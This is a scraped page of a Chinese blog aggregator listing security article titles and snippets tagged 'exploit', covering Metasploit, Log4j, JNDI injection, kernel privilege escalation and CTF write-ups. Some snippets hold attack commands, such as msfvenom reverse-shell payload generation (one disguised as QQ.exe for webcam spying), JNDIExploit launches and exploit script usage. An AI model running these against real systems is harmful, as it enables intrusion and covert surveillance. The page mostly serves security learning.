exploit 第5页

安全论坛和外包平台汇总

文章目录一.网络安全论坛汇总二.外包平台汇总1.国内：2.国外一.网络安全论坛汇总安全焦点BugTraq：http://www.fuzzysecurity.com/Exploit-DB：https://

bug小空·2023-10-11 22:48

As-Exploits v1.4更新

@yzddmr6更新日志v1.4(2021/7/24)aspx新增内存马模块aspx新增内存马管理模块jsp新增filter内存马jsp内存马管理模块增强，支持filter、servlet（thx:tomcat-memshell-killer项目）新增执行自定义payload模块解决html渲染中文乱码JSP内存马模块增强filter内存马新增filter类型内存马。内存马会把自己放到filter

yzddMr6·2023-10-09 07:26

【纽曼】第11章光

Chapter11LIGHT"Planck'sdiscoveryofthequantumin1900droveacrackinthearmorthatstillcoversthedeepandsecretprinciplesofexistence.Intheexploitationofthatopeningweareatthebeginning

证道于心·2023-10-08 23:26

Linux内核漏洞提权

目录Linux提权辅助工具内核漏洞本地用户提权-linux-exploit-suggester测试内核漏洞Web用户提权-利用脏牛dcow内核漏洞本地用户提权-利用DirtyPipe（脏管）配置安全SUID

貌美不及玲珑心，贤妻扶我青云志·2023-10-08 10:37

钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS

x.exemsfvenom-pwindows/meterpreter/reverse_tcpLHOST=192.168.96.128LPORT=4444-fexe-ox.exeMetasploit打开反向监听的命令useexploit

无名安全·2023-10-07 18:40

System vulnerabilities and common attack methods

w24y提取码：w24yAsystemvulnerabilityisaweaknessinthedesign,implementation,orconfigurationofasystemthatcanbeexploitedbyan

卢延吉·2023-10-07 06:31

Chrome出现STATUS_STACK_BUFFER_OVERRUN解决方法之一

Chrome出现STATUS_STACK_BUFFER_OVERRUN错误代码，setting都无法打开解决方法1：兼容性设置为win7解决方法2：1，开始菜单搜索ExploitProtection2，

职业演员·2023-10-06 16:58

JNDI注入-RMI&LDAP服务（详细完整原理篇，小白也能看得懂）

，用于访问ldap，rmi...的api，ldap和rmi是JNDI内置接口，他们这些接口可以远程调用执行一些文件，文件中可以命令执行，如调用计算器使用jndi注入工具：JNDI-Injection-Exploit

似锦c·2023-10-05 17:19

V8中的非预期

https://blog.keenan.top/2020/07/04/v8-exploit-basics/d8的shell支持的命令源码//Createsanewexecutionenvironmentcontainingthebuilt-in

HAPPYers·2023-10-04 17:16

【kernel exploit】CVE-2021-42008 6pack协议解码溢出漏洞利用

测试版本：Linux-v5.13.12测试环境下载地址—https://github.com/bsauce/kernel_exploit_factory原exp作者测试环境为D

bsauce·2023-10-03 21:11

利用Docker安装Protostar

Protostar的安装有两种方式第一种是下载镜像并安装虚拟机https://github.com/ExploitEducation/Protostar/releases/downl

叶卡捷琳堡·2023-10-03 00:03

ApacheCN 网络安全译文集 20211025 更新

应用的逆向和审计第四章对Android设备进行流量分析第五章Android取证第六章玩转SQLite第七章不太知名的Android漏洞第八章ARM利用第九章编写渗透测试报告SploitFunLinuxx86Exploit

布客飞龙·2023-10-01 11:33

Umbraco 7.12.4 RCE漏洞利用/ PoC

poc：https://github.com/dd404x/Umbraco-RCE用法$pythonexploit.py-husage:exploit.py[-h]-uUSER-pPASS-iURL-cCMD

e02f7fdbb400·2023-09-30 14:53

bugku 小明的博客

里面写有提示那么搜一下吧，发现这是typecho有getshell的漏洞，利用步骤：gitclonehttps://github.com/BennyThink/Typecho_deserialization_exploitcdTypecho_deserialization_exploitpythonexp.py

牛一喵·2023-09-26 19:52

认识ShellCode

exploit主要强调执行控制权，而shellcode更关注于有了控制权之后的功能。因此shellcode更像是exploit的载荷，往往对于不同漏洞来讲exploit是特

凌木LSJ·2023-09-25 15:33

网络安全1

网络攻击流程：攻击探测，漏洞利用，权限提升，权限维持，内网渗透，痕迹清理常见的攻击脚本网站https://www.exploit-db.com/漏洞公布网站https://www.cvedetails.com

596506678·2023-09-25 10:31

FTP后门

seachsploit查找漏洞信息seachsploit服务版本信息使用metasploit进行远程溢出进入msfconsolesudomsfconsole对版本漏洞进行搜索searchProFTPd-1.3.3c使用exploitusee

、十一、·2023-09-25 04:28

定制EXP之RCE

EXP(Exploit)渗透、攻击；完整的漏洞利用工具RCE(RemoteCod

网安咸鱼1517·2023-09-24 22:29

黑客圈专业术语总结

EXP：全称’Exploit'，中文’利用'，指利用系统漏洞进行攻击的动作。Payload：中文’有效载荷'，指成功exploit之后，真正在目标系统执行的代码或指令。Shel

hacker鬼七·2023-09-24 09:51

Metasploit bypassuac提权

然后后台保存这个session使用bypassuac模块，useexploit/windows/local/bypassuac，配置如图：其中session为之前保存的session参数然后run，生成一个新的

帣小王·2023-09-24 05:21

Metasploit(一)

Metasploit木马MSF模块介绍auxiliaryexploitspayloadsencodersnopspost木马管理开启监听连接多个木马木马持久化木马进程迁移生成木马生成木马木马捆绑木马混淆劫持

echokp·2023-09-23 15:26

Metasploit(二)

漏洞攻击MSF攻击模式single:直接发送一个利用脚本stage:先发送一个stager建立连接，再发送一个stage利用脚本攻击步骤searchname:0708–搜索带有0708字样的模块useexploit

echokp·2023-09-23 15:56

Exploit-DB 使用小结

Exploit-DB（网址：https://www.exploit-db.com）是一个漏洞库网站，存储了大量的漏洞利用程序，可以帮助安全研究者和渗透测试工程师更好的进行安全测试工作，目前是世界上公开收集漏洞最全的数据库

未完成的歌~·2023-09-23 09:50

beef漏洞利用框架安装

简介BeEF是目前欧美最流行的web框架攻击平台，它的全称是theBrowserexploitationframeworkproject.最近两年国外各种黑客的会议都有它的介绍，很多pentester对这个工具都有很高的赞美

kevinfaith·2023-09-23 01:32

cs派生shell到msf

然后payloaduseexploit/multi/handlersetpayloadwindows/meterpreter/r

wssmile·2023-09-20 11:52

权限提升Linux篇

://github.com/AlessandroZ/BeRoothttps://github.com/rebootuser/LinEnumhttps://github.com/mzet-/linux-exploit-suggesterhttps

blackK_YC·2023-09-20 09:49

log4j2原理分析及漏洞复现CVE-2021-44228

漏洞适用版本漏洞原理lookup功能jndi解析器jndi是什么ldap服务RMI0x03攻击过程0x04漏洞复现漏洞环境1.访问靶机2.dns回显验证3.将bash反弹shell命令编码备用4.使用JNDIExploit

rumilc·2023-09-19 20:39

打开对方的电脑的摄像头

msfvenom-pwindows/meterpreter/reverse_tcpLHOST=10.0.128.149LPORT=8888-fexe-oQQ.exe---制作木马msfconsole--进入控制台msf>useexploit

落幕_f94c·2023-09-19 14:39

2022-01-03

LoveandblessingsfortheNewYearAWinterSolsticePrayerThedarkshadowofspaceleansoverus.....Wearemindfulthatthedarknessofgreed,exploitation

饮茶洗心·2023-09-19 10:06

网络安全深入学习第四课——热门框架漏洞（RCE— Log4j2远程代码执行）

文章目录一、log4j2二、背景三、影响版本四、漏洞原理五、LDAP和JNDI是什么六、漏洞手工复现1、利用DNSlog来测试漏洞是否存在2、加载恶意文件Exploit.java，将其编译成class文件

p36273·2023-09-17 09:51

绘画二进制0x000001攻击的艺术【基于栈的溢出】

大家好，我现在计划在接下来的时间里发布一个“二进制Exploitation”系列的文章。不知道你是否知道其实这是一个在黑客空间中巨大而又核心的领域。

工程款啥时候才能下来·2023-09-17 06:36

GDB exploitable插件源码分析

0.背景源码：jfoote/exploitable:The‘exploitable’GDBplugin(github.com)1.exploitable命令实现1.1使用方式exampleusage:(

HTmonster·2023-09-17 02:26

fastjson远程命令执行

1、搭建rmi服务直接利用jndi-exploit工具2、抓包改为POST。

XXX_WXY·2023-09-16 22:31

【CTF工具】GitHack下载安装与使用（windows下）

下载方法①从github官网下载GitHub-lijiejie/GitHack:A`.git`folderdisclosureexploit②从codechina镜像站下载mirrors/lijiejie

Mitch311·2023-09-14 03:08

Google Hacking 搜索教程，一步到位。

https://www.exploit-db.com/google-hacking-database上面的网址有很多的googlehacking的例子。可以直接拿来用先了解一下一些常识。

spider.x·2023-09-13 17:39

信息收集之Google Hacking

GoogleHacking语法：https://www.exploit-db.com/google-hacking-databaseg

Thunderclap_·2023-09-13 17:38

C代写：CMSC414 Buffer Overflows Part1帮写Web开发、php代做

ProjectOverviewThisprojectwillgiveyoufirst-handexperiencewithbufferoverflowattacks.Thisattackexploitsabufferoverflowvulnerabilityinaprogramtomaketheprogrambypassitsusua

yg39584·2023-09-12 15:45

网络工程师常备工具_网络安全工程师应该知道的10种工具

Fromscanningtopost-exploitation,herearetentoolsyoumustknowifyouareintocybers

cumi7754·2023-09-12 14:17

Linux DirtyPipe权限提升漏洞 CVE-2022-0847

LinuxDirtyPipe权限提升漏洞CVE-2022-0847漏洞描述CVE-2022-0847-DirtyPipe-ExploitCVE-2022-0847是存在于Linux内核5.8及之后版本中的本地提权漏洞

阿凯6666·2023-09-11 21:27

Window 10 tensorflow 2.1 CUDA配置（cuda toolkit安装失败解决）

乌龟旅行者·2023-09-09 18:37

泛微最近的漏洞利用工具

WeaverExploit_All0x01介绍泛微最近的漏洞利用工具（PS：2023）集成了QVD-2023-5012、CVE-2023-2523、CVE-2023-2648、getloginid_ofsLogin

HACK之道·2023-09-09 17:39

ICCV 2023 | Ada3D: 利用动态推理挖掘3D感知任务中数据冗余性

以下内容来源于将门创投作者：赵天辰机构：清华大学电子工程系研究方向：硬件友好的高效深度学习论文标题：Ada3D:ExploitingtheSpatialRedundancywithAdaptiveInferenceforEfficient3DObjectDetection

AITIME论道·2023-09-09 13:28

fastjson 1.2.24 反序列化导致任意命令执行漏洞复现

插件告诉我们这里有漏洞，并且提供了POC既然我们发现有rmi，那么我们需要构建一个rmi服务器[JNDI]sudowgethttps://github.com/welk1n/JNDI-Injection-Exploit

blackK_YC·2023-09-08 19:21

无线安全[蓝牙测试案例1-metasploit]

背景刚接触蓝牙，于是玩了那么一下下，现在分享出来，希望能与大家一起学习先来了解蓝牙哈(¯▽¯)~（如果哪里错啦，希望大大萌轻点打~(>﹏~/fuck.apk打开msf，启动监听useexploit/mutli

_0x00·2023-09-08 17:34

picoCTF，Web Exploitation，网页开发类，39/45

picoCTF，WebExploitation，39/452019picoCTF01、Insp3ct0r，50分02、dont-use-client-side，100分03、logon，100分04、wherearetherobots

Allezima·2023-09-08 17:58

新年幽默：Casey Neistat 智斗汉堡王

CaseyNeistat展示被汉堡王点赞的推文图片来自《EXPLOITEDBYBURGERKING》他发帖询问原因，得到了上万点赞。后来看到网上的信息，才明白汉堡王在借此宣传他们的产品

幸运的Aha·2023-09-08 16:51

什么是网络钓鱼，攻击类型和防御？

Phishingisacybersecurityattacktoconvincetargethumanstoconvincetoprovidesomevaluableinformationaboutthemortheirassets.Phishingmainlytargetshumanbeingandhuman-relatedvulnerabilitiestoexploit

cunjiu9486·2023-09-08 13:58

【kernel exploit】CVE-2017-7308 AF_PACKET 环形缓冲区溢出漏洞

影响版本：Linux-v4.10.6由syzkaller发现。实际v4.10.10未修复，v4.10.11已修复。测试版本：Linux-v4.10.6测试环境下载地址编译选项：CONFIG_PACKET=y（启用AF_PACKET套接字选项）CONFIG_USER_NS=y（用户命名空间—CAP_NET_RAW权限）CONFIG_SLAB=yGeneralsetup--->ChooseSLABal

bsauce·2023-09-08 04:12

JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞复现中的使用

1.首先搭建log4j靶场2.开启服务Windows攻击端执行以下命令java-jarJNDIExploit-1.2-SNAPSHOT.jar-l8888-p9999-i127.0.0.1再开一个cmd

wutiangui·2023-09-08 02:57

木马的攻击与防御（MSF）

它集成了以下4个模块：exploits模块漏洞攻击模块列表，入侵式命名规则：模块/系统/服务/名称payloads模块漏洞负载模块与exploits模块配合使用的用于入侵后的操作auxiliary模块辅助模块

yAnd0n9·2023-09-07 12:04

推荐频道

exploit